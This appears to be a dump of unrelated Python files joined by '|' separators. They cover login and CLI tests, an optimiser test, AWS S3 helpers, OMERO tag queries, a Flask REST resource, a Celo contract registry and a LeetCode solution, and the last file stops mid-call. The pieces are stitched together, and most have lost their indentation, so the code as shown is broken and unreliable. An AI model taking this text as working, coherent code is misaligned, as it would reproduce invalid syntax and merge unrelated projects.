import stat
from medperf.comms import Comms
import medperf.config as config
from medperf.commands import Login
from medperf.utils import storage_path
import pytest
from unittest.mock import mock_open
@pytest.fixture(params=["token123"])
def comms(mocker, request):
comms = mocker.create_autospec(spec=Comms)
mocker.patch.object(comms, "login")
mocker.patch("os.remove")
mocker.patch("os.chmod")
comms.token = request.param
return comms
def test_runs_comms_login(mocker, comms, ui):
# Arrange
spy = mocker.patch.object(comms, "login")
mocker.patch("builtins.open", mock_open())
# Act
Login.run(comms, ui)
# Assert
spy.assert_called_once()
def test_removes_previous_credentials(mocker, comms, ui):
# Arrange
creds_path = storage_path(config.credentials_path)
spy = mocker.patch("os.remove")
mocker.patch("builtins.open", mock_open())
mocker.patch("os.path.exists", return_value=True)
# Act
Login.run(comms, ui)
# Assert
spy.assert_called_once_with(creds_path)
@pytest.mark.parametrize(
"comms", ["test123", "wey0u392472340", "tokentoken"], indirect=True
)
def test_writes_new_credentials(mocker, comms, ui):
# Arrange
m = mock_open()
creds_path = storage_path(config.credentials_path)
spy = mocker.patch("builtins.open", m)
# Act
Login.run(comms, ui)
# Assert
spy.assert_called_once_with(creds_path, "w")
handle = m()
handle.write.assert_called_once_with(comms.token)
def test_sets_credentials_permissions_to_read(mocker, comms, ui):
# Arrange
creds_path = storage_path(config.credentials_path)
spy = mocker.patch("os.chmod")
mocker.patch("builtins.open", mock_open())
# Act
Login.run(comms, ui)
# Assert
spy.assert_called_once_with(creds_path, stat.S_IREAD)
|
from shutil import copy
import os
# To list all the files which have more than 100 lines
# find ALLIN -name "*.csv" -type f -exec sh -c 'test `wc -l {} | cut -f1 -d" "` -gt "100"' \; -print | tee abc
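# A hedged Python alternative (added, not in the original): build the same 'abc'
# file list without the shell one-liner above, by counting lines in each CSV
# under ALLIN. Kept commented out so the script's behaviour is unchanged.
#
#     with open('abc', 'w') as out:
#         for dirpath, _, filenames in os.walk('ALLIN'):
#             for name in filenames:
#                 if name.endswith('.csv'):
#                     full = os.path.join(dirpath, name)
#                     with open(full) as fh:
#                         if sum(1 for _ in fh) > 100:
#                             out.write(full + '\n')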
# get the current path
path = os.getcwd()
# prepare the destination path
dest = path + "/FILTERED/"
# open the file listing and copy each listed file to the destination
with open('abc') as files:
    for src in files:
        src = src.strip()
        copy(src, dest)
|
""" Tests for seed_services_cli.identity_store """
from unittest import TestCase
from click.testing import CliRunner
from seed_services_cli.main import cli
import responses
import json
class TestSendCommand(TestCase):
def setUp(self):
self.runner = CliRunner()
def tearDown(self):
pass
def invoke_user_add(self, args, first_name="First", last_name="Last",
email="test@example.com", password="pass",
admin=False):
if admin:
args = args + ["--admin"]
return self.runner.invoke(cli, [
'auth-user-add',
'--first_name', first_name,
'--last_name', last_name,
'--email', email,
'--password', password,
] + args)
def invoke_user_change_password(self, args, email, password):
return self.runner.invoke(cli, [
'auth-user-change-password',
'--email', email,
'--password', password,
] + args)
def invoke_user_add_team(self, args, user=2, team=3):
return self.runner.invoke(cli, [
'auth-user-add-team',
'--user', user,
'--team', team,
] + args)
def test_user_add_help(self):
result = self.runner.invoke(cli, ['auth-user-add', '--help'])
self.assertEqual(result.exit_code, 0)
self.assertTrue(
"Create a user"
in result.output)
@responses.activate
def test_user_add_no_details(self):
# setup
login_response = {
"token": "3e6de6f2cace86d3ac22d0a58e652f4b283ab58c"
}
responses.add(responses.POST,
"http://auth.example.org/user/tokens/",
json=login_response, status=201)
result = self.runner.invoke(cli, ['auth-user-add'])
self.assertEqual(result.exit_code, 2)
self.assertTrue(
"Please specify all new user information. See --help."
in result.output)
@responses.activate
def test_user_add(self):
# setup
login_response = {
"token": "3e6de6f2cace86d3ac22d0a58e652f4b283ab58c"
}
responses.add(responses.POST,
"http://auth.example.org/user/tokens/",
json=login_response, status=201)
user_response = {
"id": "3",
"url": "http://auth.example.org/users/9/",
"first_name": "First",
"last_name": "Last",
"email": "test@example.com",
"admin": False,
"teams": [],
"organizations": [],
"active": False
}
responses.add(responses.POST,
"http://auth.example.org/users/",
json=user_response, status=200)
# Execute
result = self.invoke_user_add([])
# Check
self.assertEqual(result.exit_code, 0)
self.assertTrue("Creating account for test@example.com"
in result.output)
self.assertTrue("Created user. ID is 3." in result.output)
self.assertEqual(len(responses.calls), 2)
self.assertEqual(responses.calls[1].request.url,
"http://auth.example.org/users/")
@responses.activate
def test_user_add_admin(self):
# setup
login_response = {
"token": "3e6de6f2cace86d3ac22d0a58e652f4b283ab58c"
}
responses.add(responses.POST,
"http://auth.example.org/user/tokens/",
json=login_response, status=201)
user_response = {
"id": "3",
"url": "http://auth.example.org/users/9/",
"first_name": "First",
"last_name": "Last",
"email": "test@example.com",
"admin": False,
"teams": [],
"organizations": [],
"active": True
}
responses.add(responses.POST,
"http://auth.example.org/users/",
json=user_response, status=200)
# Execute
result = self.invoke_user_add([], admin=True)
# Check
self.assertEqual(result.exit_code, 0)
self.assertTrue("Creating account for test@example.com"
in result.output)
self.assertTrue("Created user. ID is 3." in result.output)
self.assertEqual(len(responses.calls), 2)
self.assertEqual(responses.calls[1].request.url,
"http://auth.example.org/users/")
@responses.activate
def test_user_change_password(self):
login_response = {
"token": "3e6de6f2cace86d3ac22d0a58e652f4b283ab58c"
}
responses.add(responses.POST,
"http://auth.example.org/user/tokens/",
json=login_response, status=201)
users_response = [{
'email': 'test@example.org',
}, {
'id': 2,
'email': 'test2@example.org'
}]
responses.add(responses.GET,
"http://auth.example.org/users/",
json=users_response, status=200)
responses.add(responses.PUT,
"http://auth.example.org/users/2/",
json={}, status=200)
result = self.invoke_user_change_password(
[], email='test2@example.org', password='testpass')
self.assertEqual(result.exit_code, 0)
self.assertTrue(
'Changing password for test2@example.org' in result.output)
self.assertEqual(len(responses.calls), 3)
self.assertEqual(
json.loads(responses.calls[2].request.body)['password'],
'testpass')
def test_user_add_team_help(self):
result = self.runner.invoke(cli, ['auth-user-add-team', '--help'])
self.assertEqual(result.exit_code, 0)
self.assertTrue(
"Add a user to a team"
in result.output)
@responses.activate
def test_user_add_user_team_no_details(self):
# setup
login_response = {
"token": "3e6de6f2cace86d3ac22d0a58e652f4b283ab58c"
}
responses.add(responses.POST,
"http://auth.example.org/user/tokens/",
json=login_response, status=201)
result = self.runner.invoke(cli, ['auth-user-add-team'])
self.assertEqual(result.exit_code, 2)
self.assertTrue(
"Please specify user and team. See --help."
in result.output)
|
"""Unit tests for the nag solver.
.. codeauthor:: Derek Huang <djh458@stern.nyu.edu>
"""
import numpy as np
import pytest
# pylint: disable=relative-beyond-top-level
from .._fast_gd import nag_solver
# mixtures of learning rate schedules and step sizes
_nag_learn_rates = [("backtrack", 1.), ("constant", 0.1)]
@pytest.mark.parametrize("learning_rate,eta0", _nag_learn_rates)
def test_nag_solver(convex_quad_min, learning_rate, eta0):
"""Test nag_solver on convex QP defined by convex_quad_min.
Parameters
----------
convex_quad_min : tuple
pytest fixture. See conftest.py.
learning_rate : str
Learning rate schedule to use, either "constant" or "backtrack".
eta0 : float
For learning_rate="constant", the learning rate to use, while for
learning_rate="backtrack", the learning rate upper search bound.
"""
# get objective, gradient, solution from convex_quad_min + dimensionality
fobj, fgrad, _, sol = convex_quad_min
n_dim = sol.size
# initial guess
x0 = np.zeros(n_dim)
# get FastGradResult using nag_solver
res = nag_solver(
fobj,
x0,
fgrad=fgrad,
learning_rate=learning_rate,
eta0=eta0,
tol=1e-8,
max_iter=2000
)
# check that res.loss is more or less the same as the optimal fobj value
np.testing.assert_allclose(res.loss, fobj(sol))
# check that res.res is close to the actual solution of convex_quad_min.
# need looser criteria on assert_allclose since optimization is hard
np.testing.assert_allclose(res.res, sol, rtol=1e-4)
|
import sys
from geo.calc import Calc, Distance
if sys.version_info[0] >= 3:
def test_add():
assert Calc().add(2, 3) == 5, 'Should be 5'
def test_mul():
assert Calc().multiply(2, 3) == 6, 'Should be 6'
def test_power():
assert Distance(2).power(2) == 4, 'Should be 4'
else:
import unittest
class TestCode(unittest.TestCase):
def test_add(self):
self.assertEqual(Calc().add(2, 3), 5, "Should be 5")
def test_mul(self):
self.assertEqual(Calc().multiply(2, 3), 6, "Should be 6")
def test_power(self):
self.assertEqual(Distance(2).power(2), 4, "Should be 4")
if __name__ == '__main__':
unittest.main()
|
import os
import json
from assisted_service_client import ApiClient, Configuration, api, models
class InventoryHost:
def __init__(self, host_dict):
self._host = models.Host(**host_dict)
self._inventory = models.Inventory(**json.loads(self._host.inventory))
def get_inventory_host_nics_data(self):
interfaces_list = [models.Interface(**interface) for interface in self._inventory.interfaces]
return [{'name': interface.name, 'model': interface.product, 'mac': interface.mac_address, 'ip': self._get_network_interface_ip(interface), 'speed': interface.speed_mbps} for interface in interfaces_list]
def get_inventory_host_cpu_data(self):
cpu = models.Cpu(**self._inventory.cpu)
return {'model': cpu.model_name, 'arch': cpu.architecture, 'flags': cpu.flags, 'clockMegahertz': cpu.frequency, 'count': cpu.count}
def get_inventory_host_storage_data(self):
disks_list = [models.Disk(**disk) for disk in self._inventory.disks]
return [{'name': disk.name, 'vendor': disk.vendor, 'sizeBytes': disk.size_bytes, 'model': disk.model, 'wwn': disk.wwn, 'hctl': disk.hctl, 'serialNumber': disk.serial, 'rotational': True if disk.drive_type == 'HDD' else False} for disk in disks_list]
def get_inventory_host_memory(self):
memory = models.Memory(**self._inventory.memory)
return int(memory.physical_bytes / 1024 / 1024)
def get_inventory_host_name(self):
return self._host.requested_hostname
def get_inventory_host_system_vendor(self):
system_vendor = models.SystemVendor(**self._inventory.system_vendor)
return {'manufacturer': system_vendor.manufacturer, 'productName': system_vendor.product_name, 'serialNumber': system_vendor.serial_number}
def is_role(self, role):
return self._host.role == role
def _get_network_interface_ip(self, interface):
if len(interface.ipv4_addresses) > 0:
return interface.ipv4_addresses[0].split("/")[0]
if len(interface.ipv6_addresses) > 0:
return interface.ipv6_addresses[0].split("/")[0]
return " "
def get_inventory_hosts(inventory_endpoint, cluster_id, token, skip_cert_verification=False, ca_cert_path=None):
configs = Configuration()
configs.host = inventory_endpoint
configs.api_key["X-Secret-Key"] = token
configs.verify_ssl = not skip_cert_verification
configs.ssl_ca_cert = ca_cert_path
apiClient = ApiClient(configuration=configs)
client = api.InstallerApi(api_client=apiClient)
hosts_list = client.list_hosts(cluster_id=cluster_id)
return [InventoryHost(host) for host in hosts_list if host['status'] != 'disabled']
|
from flask import request
from flask_jwt_extended import get_jwt_identity, jwt_required
from flask_restful import Resource
from mongoengine.errors import DoesNotExist, NotUniqueError, ValidationError  # assumed ODM: mongoengine
from ...models import Client, User, WebhookSubscription
from ...schemas import ClientSchema, Fields  # assumed: Fields is exported by the schemas module
from .responses import respond
class ClientListResource(Resource):
@jwt_required
def get(self):
schema = ClientSchema(many=True, only=Fields.Client.compact)
user = User.objects.get(username=get_jwt_identity())
subscriptions = WebhookSubscription.objects(user=user)
clients = set(subscription.client for subscription in subscriptions)
return respond(200, {'clients': schema.dump(clients).data})
@jwt_required
def post(self):
schema = ClientSchema()
client = Client(**schema.load(request.args).data)
client.user = User.objects.get(username=get_jwt_identity())
try:
client.save()
except (NotUniqueError, ValidationError) as e:
return respond(400, {}, ['Validation error', str(e)])
return respond(201, {'client': schema.dump(client).data})
class ClientResource(Resource):
@jwt_required
def get(self, id):
try:
client = Client.objects.get(id=id)
except (DoesNotExist, ValidationError):
return respond(404, {}, ['Client does not exist'])
if get_jwt_identity() == client.user.username:
schema = ClientSchema()
else:
return respond(403, {}, ['Access forbidden'])
return respond(200, {'client': schema.dump(client).data})
@jwt_required
def put(self, id):
try:
client = Client.objects.get(id=id)
except (DoesNotExist, ValidationError):
return respond(404, {}, ['Client does not exist'])
if get_jwt_identity() == client.user.username:
schema = ClientSchema()
else:
return respond(403, {}, ['Access forbidden'])
try:
client.update(**schema.load(request.args).data)
# Return updated document
client = Client.objects.get(id=id)
except (NotUniqueError, ValidationError) as e:
return respond(400, {}, ['Validation error', str(e)])
return respond(200, {'client': schema.dump(client).data})
@jwt_required
def delete(self, id):
try:
client = Client.objects.get(id=id)
except (DoesNotExist, ValidationError):
return respond(404, {}, ['Client does not exist'])
if get_jwt_identity() != client.user.username:
return respond(403, {}, ['Access forbidden'])
client.delete()
return respond(204)
|
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with
# the License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "LICENSE.txt" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, express or implied. See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, print_function
import json
import os
import zipfile
from io import BytesIO
import boto3
from botocore.exceptions import ClientError
def boto3_client(service, aws_client_config):
return boto3.client(
service,
region_name=aws_client_config["region_name"],
aws_access_key_id=aws_client_config["aws_access_key_id"],
aws_secret_access_key=aws_client_config["aws_secret_access_key"],
)
def boto3_resource(service, aws_client_config):
return boto3.resource(
service,
region_name=aws_client_config["region_name"],
aws_access_key_id=aws_client_config["aws_access_key_id"],
aws_secret_access_key=aws_client_config["aws_secret_access_key"],
)
def create_s3_bucket(bucket_name, aws_client_config):
"""
Create a new S3 bucket.
Args:
bucket_name: name of the S3 bucket to create
aws_client_config: dictionary containing configuration params for boto3 client
"""
s3_client = boto3_client("s3", aws_client_config)
""" :type : pyboto3.s3 """
try:
region = aws_client_config["region_name"]
if region != "us-east-1":
s3_client.create_bucket(Bucket=bucket_name, CreateBucketConfiguration={"LocationConstraint": region})
else:
s3_client.create_bucket(Bucket=bucket_name)
except s3_client.exceptions.BucketAlreadyOwnedByYou:
print("Bucket already exists")
def delete_s3_bucket(bucket_name, aws_client_config):
"""
Delete an S3 bucket together with all stored objects.
Args:
bucket_name: name of the S3 bucket to delete
aws_client_config: dictionary containing configuration params for boto3 client
"""
try:
bucket = boto3_resource("s3", aws_client_config).Bucket(bucket_name)
bucket.objects.all().delete()
bucket.delete()
except boto3.client("s3").exceptions.NoSuchBucket:
pass
except ClientError:
print("Failed to delete bucket %s. Please delete it manually." % bucket_name)
def zip_dir(path):
"""
Create a zip archive containing all files and dirs rooted in path.
The archive is created in memory and a file handler is returned by the function.
Args:
path: directory containing the resources to archive.
Return:
file_out: file handler pointing to the compressed archive.
"""
file_out = BytesIO()
with zipfile.ZipFile(file_out, "w", zipfile.ZIP_DEFLATED) as ziph:
for root, _, files in os.walk(path):
for file in files:
ziph.write(os.path.join(root, file), os.path.relpath(os.path.join(root, file), start=path))
file_out.seek(0)
return file_out
def upload_resources_artifacts(bucket_name, root, aws_client_config):
"""
Upload to the specified S3 bucket the content of the directory rooted in root path.
All dirs contained in root dir will be uploaded as zip files to $bucket_name/$dir_name/artifacts.zip.
All files contained in root dir will be uploaded to $bucket_name.
Args:
bucket_name: name of the S3 bucket where files are uploaded
root: root directory containing the resources to upload.
aws_client_config: dictionary containing configuration params for boto3 client
"""
bucket = boto3_resource("s3", aws_client_config).Bucket(bucket_name)
for res in os.listdir(root):
if os.path.isdir(os.path.join(root, res)):
bucket.upload_fileobj(zip_dir(os.path.join(root, res)), "%s/artifacts.zip" % res)
elif os.path.isfile(os.path.join(root, res)):
bucket.upload_file(os.path.join(root, res), res)
def _get_json_from_s3(region, file_name):
"""
Get the named file from the region's aws-parallelcluster S3 bucket and parse its content as JSON.
:param region: AWS Region
:param file_name the object name to get
:return: a json object representing the file content
:raises ClientError if unable to download the file
:raises ValueError if unable to decode the file content
"""
s3 = boto3.resource("s3", region_name=region)
bucket_name = "{0}-aws-parallelcluster".format(region)
file_contents = s3.Object(bucket_name, file_name).get()["Body"].read().decode("utf-8")
return json.loads(file_contents)
def get_supported_features(region, feature):
"""
Get a json object containing the attributes supported by a feature, for example:
{
"Features": {
"efa": {
"instances": ["c5n.18xlarge", "p3dn.24xlarge", "i3en.24xlarge"],
"baseos": ["alinux", "centos7"],
"schedulers": ["sge", "slurm", "torque"]
},
"awsbatch": {
"instances": ["r3.8xlarge", ..., "m5.4xlarge"]
}
}
}
:param region: AWS Region
:param feature: the feature to search for, e.g. "efa" or "awsbatch"
:return: json object containing all the attributes supported by feature
"""
try:
features = _get_json_from_s3(region, "features/feature_whitelist.json")
supported_features = features.get("Features").get(feature)
except (ValueError, ClientError, KeyError):
print(
"Failed validate %s. This is probably a bug on our end. Please set sanity_check = false and retry" % feature
)
exit(1)
return supported_features
def get_instance_vcpus(region, instance_type):
"""
Get number of vcpus for the given instance type.
:param region: AWS Region
:param instance_type: the instance type to search for.
:return: the number of vcpus or -1 if the instance type cannot be found
or the pricing file cannot be retrieved/parsed
"""
try:
instances = _get_json_from_s3(region, "instances/instances.json")
vcpus = int(instances[instance_type]["vcpus"])
except (KeyError, ValueError, ClientError):
vcpus = -1
return vcpus
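# A minimal usage sketch (added, not part of the module). It needs network access
# to the public "<region>-aws-parallelcluster" S3 bucket; the region and instance
# type below are illustrative only.
if __name__ == "__main__":
    region = "us-east-1"
    efa = get_supported_features(region, "efa")
    print("EFA-capable instance types:", efa.get("instances", []))
    print("c5n.18xlarge vCPUs:", get_instance_vcpus(region, "c5n.18xlarge"))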
|
# Copyright (c) 2019, CRS4
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import omero
from omero.gateway import TagAnnotationWrapper
from .projects_datasets import _image_to_json
from .utils import switch_to_default_search_group
def _is_tagset(obj):
try:
obj.countTagsInTagset()
return True
except TypeError:
return False
def _tag_to_json(tag_object, images_list):
return {
'id': tag_object.getId(),
'type': 'tag',
'value': tag_object.getValue(),
'description': tag_object.getDescription(),
'images': images_list
}
def _tagset_to_json(tagset_object, tags_map=None):
if not tags_map:
tags_map = list()
return {
'id': tagset_object.getId(),
'type': 'tagset',
'value': tagset_object.getValue(),
'description': tagset_object.getDescription(),
'tags': tags_map
}
def _get_tags_list(connection, tagset_obj, fetch_images=False, append_raw_object=False):
tags = list()
for t in tagset_obj.listTagsInTagset():
images = list()
if fetch_images:
images = _get_images_by_tag(t.getId(), connection)
tag_json = _tag_to_json(t, images)
if append_raw_object:
tag_json['obj'] = t
tags.append(tag_json)
return tags
def _get_images_by_tag(tag_id, connection):
switch_to_default_search_group(connection)
imgs_generator = connection.getObjectsByAnnotations('Image', [tag_id])
images = list()
for img in imgs_generator:
images.append(_image_to_json(img, connection))
return images
def get_annotations_list(connection, fetch_images=False):
switch_to_default_search_group(connection)
tag_sets = list()
tags = list()
for t in connection.getObjects("TagAnnotation"):
if _is_tagset(t):
tag_sets.append(t)
else:
tags.append(t)
annotations = list()
for ts in tag_sets:
tags_map = _get_tags_list(connection, ts, fetch_images, append_raw_object=True)
for tmi in tags_map:
tobj = tmi.pop('obj')
try:
tags.pop(tags.index(tobj))
except ValueError:
pass
tagset_json = _tagset_to_json(ts, tags_map)
annotations.append(tagset_json)
for t in tags:
imgs_list = list()
if fetch_images:
imgs_list = _get_images_by_tag(t.getId(), connection)
annotations.append(_tag_to_json(t, imgs_list))
return annotations
def get_tagset(connection, tagset_id, fetch_tags=False, fetch_images=False):
switch_to_default_search_group(connection)
tagset = connection.getObject('TagAnnotation', tagset_id)
if tagset is not None and _is_tagset(tagset):
tags_map = list()
if fetch_tags:
tags_map = _get_tags_list(connection, tagset, fetch_images)
return _tagset_to_json(tagset, tags_map)
else:
return None
def get_tag(connection, tag_id, fetch_images=False):
switch_to_default_search_group(connection)
tag = connection.getObject('TagAnnotation', tag_id)
if tag is not None and not _is_tagset(tag):
images = list()
if fetch_images:
images = _get_images_by_tag(tag_id, connection)
return _tag_to_json(tag, images)
else:
return None
def find_annotations(search_pattern, connection, fetch_images=False):
switch_to_default_search_group(connection)
query_service = connection.getQueryService()
query_params = omero.sys.ParametersI()
query_params.addString('search_pattern', '%%%s%%' % search_pattern)
query = '''
SELECT t FROM TagAnnotation t
WHERE lower(t.description) LIKE lower(:search_pattern)
OR lower(t.textValue) LIKE lower(:search_pattern)
'''
annotations = list()
for res in query_service.findAllByQuery(query, query_params):
res = TagAnnotationWrapper(connection, res)
if _is_tagset(res):
annotations.append(_tagset_to_json(res))
else:
imgs_list = list()
if fetch_images:
imgs_list = _get_images_by_tag(res.getId(), connection)
annotations.append(_tag_to_json(res, imgs_list))
return annotations
|
from onegov.fsi.models.course_event import (
COURSE_EVENT_STATUSES_TRANSLATIONS, COURSE_EVENT_STATUSES
)
from onegov.fsi.models.course_notification_template import \
NOTIFICATION_TYPE_TRANSLATIONS, NOTIFICATION_TYPES
from onegov.org.layout import DefaultLayout as BaseLayout
from onegov.fsi import _
class FormatMixin:
@staticmethod
def format_status(model_status):
return COURSE_EVENT_STATUSES_TRANSLATIONS[
COURSE_EVENT_STATUSES.index(model_status)
]
@staticmethod
def format_notification_type(notification_type):
return NOTIFICATION_TYPE_TRANSLATIONS[
NOTIFICATION_TYPES.index(notification_type)
]
def format_boolean(self, val):
assert isinstance(val, bool)
return self.request.translate((_('Yes') if val else _('No')))
class DefaultLayout(BaseLayout, FormatMixin):
def include_accordion(self):
self.request.include('accordion')
def instance_link(self, instance):
return self.request.link(instance)
|
from .abc import (
BaseAuth,
BaseAuthSession,
BaseSync,
InvalidAuthSession,
ServiceImplementation,
)
from .exc import (
ServiceAPIError,
ServiceAuthError,
ServiceError,
ServiceRateLimitError,
ServiceTokenExpiredError,
ServiceUnavailableError,
UserCancelledError,
)
from .retries import retry_ratelimited, retry_unavailable
__all__ = (
"BaseAuth",
"BaseAuthSession",
"BaseSync",
"InvalidAuthSession",
"ServiceAPIError",
"ServiceAuthError",
"ServiceError",
"ServiceImplementation",
"ServiceRateLimitError",
"ServiceTokenExpiredError",
"ServiceUnavailableError",
"UserCancelledError",
"retry_ratelimited",
"retry_unavailable",
)
|
"""
time: 17 min
errors:
off by one with slice s[mj:mi]
forgot to move failure pointer
"""
class Solution:
def minWindow(self, s: str, t: str) -> str:
j = 0
matched = 0
ht = {}
minRes = float('inf')
mi = mj = 0
for c in t:
ht[c] = ht.get(c, 0) + 1
for i, c in enumerate(s):
if c in ht:
ht[c] -= 1
if ht[c] == 0:
matched += 1
if matched == len(ht):
if i - j + 1 < minRes:
minRes = i - j + 1
mi = i + 1
mj = j
while matched == len(ht):
jc = s[j]
if matched == len(ht):
if i - j + 1 < minRes:
minRes = i - j + 1
mi = i+1
mj = j
if jc in ht:
if ht[jc] == 0:
matched -= 1
ht[jc] += 1
j += 1
if mi == 0 and mj == 0:
return ''
return s[mj:mi]
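# A quick sanity check (added, not part of the original notes): for the classic
# LeetCode 76 example, the minimum window of "ADOBECODEBANC" covering "ABC"
# should be "BANC".
if __name__ == "__main__":
    assert Solution().minWindow("ADOBECODEBANC", "ABC") == "BANC"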
|
import json
from typing import List
from pkg_resources import resource_filename
class Registry:
"""
It will get every contract address from the registry contract and return this address with the contract ABI.
Attributes
web3: web3.Web3
web3 object
"""
def __init__(self, web3: "Web3 object"):
self.web3 = web3
def load_all_contracts(self) -> List[dict]:
"""
Return addresses and ABIs of all the known contracts
"""
try:
with open(resource_filename('celo_sdk', 'registry_contracts.json')) as json_file:
contracts_data = json.load(json_file)
result = []
for k, v in contracts_data.items():
if k != "Registry":
contract_address = self.registry.functions.getAddressForString(
k).call()
result.append(
{"contract_name": k, "address": contract_address, "abi": v["ABI"]})
return result
except KeyError:
raise KeyError(
"Key not found in registry_contracts.json config file")
except FileNotFoundError:
raise FileNotFoundError(
"File with contracts ABIs registry_contracts.json not found")
def load_contract_by_name(self, contract_name: str, contract_address: str = None) -> dict:
"""
Get contract address from Registry contract by name
Parameters:
contract_name: str
Returns:
dictionary with contract address and ABI
"""
try:
account_contract_address = self.registry.functions.getAddressForString(
contract_name).call() if contract_address is None else contract_address
with open(resource_filename('celo_sdk', 'registry_contracts.json')) as json_file:
contracts_data = json.load(json_file)
return {"address": account_contract_address, "abi": contracts_data[contract_name]["ABI"]}
except KeyError:
raise KeyError(
"Key not found in registry_contracts.json config file")
except FileNotFoundError:
raise FileNotFoundError(
"File with contracts ABIs registry_contracts.json not found")
def set_registry(self):
"""
Set Registry contract object
"""
try:
with open(resource_filename('celo_sdk', 'registry_contracts.json')) as json_file:
contracts_data = json.load(json_file)
registry = self.web3.eth.contract(
contracts_data["Registry"]["Address"], abi=contracts_data["Registry"]["ABI"])
self.registry = registry
except KeyError:
raise KeyError(
"Key not found in registry_contracts.json config file")
except FileNotFoundError:
raise FileNotFoundError(
"File with contracts ABIs registry_contracts.json not found")
|
from django.urls import reverse
from ....acl import ACL_CACHE
from ....admin.test import AdminTestCase
from ....cache.test import assert_invalidates_cache
from ....threads import test
from ....threads.models import Thread
from ...models import Category
class CategoryAdminTestCase(AdminTestCase):
def assertValidTree(self, expected_tree):
root = Category.objects.root_category()
queryset = Category.objects.filter(tree_id=root.tree_id).order_by("lft")
current_tree = []
for category in queryset:
current_tree.append(
(
category,
category.level,
category.lft - root.lft + 1,
category.rght - root.lft + 1,
)
)
if len(expected_tree) != len(current_tree):
self.fail(
"nodes tree is %s items long, should be %s"
% (len(current_tree), len(expected_tree))
)
for i, category in enumerate(expected_tree):
_category = current_tree[i]
if category[0] != _category[0]:
self.fail(
("expected category at index #%s to be %s, " "found %s instead")
% (i, category[0], _category[0])
)
if category[1] != _category[1]:
self.fail(
("expected level at index #%s to be %s, " "found %s instead")
% (i, category[1], _category[1])
)
if category[2] != _category[2]:
self.fail(
("expected lft at index #%s to be %s, " "found %s instead")
% (i, category[2], _category[2])
)
if category[3] != _category[3]:
self.fail(
("expected lft at index #%s to be %s, " "found %s instead")
% (i, category[3], _category[3])
)
class CategoryAdminViewsTests(CategoryAdminTestCase):
def test_link_registered(self):
"""admin nav contains categories link"""
response = self.client.get(reverse("misago:admin:categories:index"))
self.assertContains(response, reverse("misago:admin:categories:index"))
def test_list_view(self):
"""categories list view returns 200"""
response = self.client.get(reverse("misago:admin:categories:index"))
self.assertContains(response, "First category")
# Now test that empty categories list contains message
root = Category.objects.root_category()
for descendant in root.get_descendants():
descendant.delete()
response = self.client.get(reverse("misago:admin:categories:index"))
self.assertEqual(response.status_code, 200)
self.assertContains(response, "No categories")
def test_new_view(self):
"""new category view has no showstoppers"""
root = Category.objects.root_category()
first_category = Category.objects.get(slug="first-category")
response = self.client.get(reverse("misago:admin:categories:new"))
self.assertEqual(response.status_code, 200)
response = self.client.post(
reverse("misago:admin:categories:new"),
data={
"name": "Test Category",
"description": "Lorem ipsum dolor met",
"new_parent": root.pk,
"prune_started_after": 0,
"prune_replied_after": 0,
},
)
self.assertEqual(response.status_code, 302)
response = self.client.get(reverse("misago:admin:categories:index"))
self.assertContains(response, "Test Category")
test_category = Category.objects.get(slug="test-category")
self.assertValidTree(
[(root, 0, 1, 6), (first_category, 1, 2, 3), (test_category, 1, 4, 5)]
)
response = self.client.post(
reverse("misago:admin:categories:new"),
data={
"name": "Test Other Category",
"description": "Lorem ipsum dolor met",
"new_parent": root.pk,
"prune_started_after": 0,
"prune_replied_after": 0,
},
)
self.assertEqual(response.status_code, 302)
test_other_category = Category.objects.get(slug="test-other-category")
self.assertValidTree(
[
(root, 0, 1, 8),
(first_category, 1, 2, 3),
(test_category, 1, 4, 5),
(test_other_category, 1, 6, 7),
]
)
response = self.client.post(
reverse("misago:admin:categories:new"),
data={
"name": "Test Subcategory",
"new_parent": test_category.pk,
"copy_permissions": test_category.pk,
"prune_started_after": 0,
"prune_replied_after": 0,
},
)
self.assertEqual(response.status_code, 302)
test_subcategory = Category.objects.get(slug="test-subcategory")
self.assertValidTree(
[
(root, 0, 1, 10),
(first_category, 1, 2, 3),
(test_category, 1, 4, 7),
(test_subcategory, 2, 5, 6),
(test_other_category, 1, 8, 9),
]
)
response = self.client.get(reverse("misago:admin:categories:index"))
self.assertContains(response, "Test Subcategory")
def test_creating_new_category_invalidates_acl_cache(self):
root = Category.objects.root_category()
with assert_invalidates_cache(ACL_CACHE):
self.client.post(
reverse("misago:admin:categories:new"),
data={
"name": "Test Category",
"description": "Lorem ipsum dolor met",
"new_parent": root.pk,
"prune_started_after": 0,
"prune_replied_after": 0,
},
)
def test_edit_view(self):
"""edit category view has no showstoppers"""
private_threads = Category.objects.private_threads()
root = Category.objects.root_category()
first_category = Category.objects.get(slug="first-category")
response = self.client.get(
reverse("misago:admin:categories:edit", kwargs={"pk": private_threads.pk})
)
self.assertEqual(response.status_code, 302)
response = self.client.get(
reverse("misago:admin:categories:edit", kwargs={"pk": root.pk})
)
self.assertEqual(response.status_code, 302)
response = self.client.post(
reverse("misago:admin:categories:new"),
data={
"name": "Test Category",
"description": "Lorem ipsum dolor met",
"new_parent": root.pk,
"prune_started_after": 0,
"prune_replied_after": 0,
},
)
self.assertEqual(response.status_code, 302)
test_category = Category.objects.get(slug="test-category")
response = self.client.get(
reverse("misago:admin:categories:edit", kwargs={"pk": test_category.pk})
)
self.assertContains(response, "Test Category")
response = self.client.post(
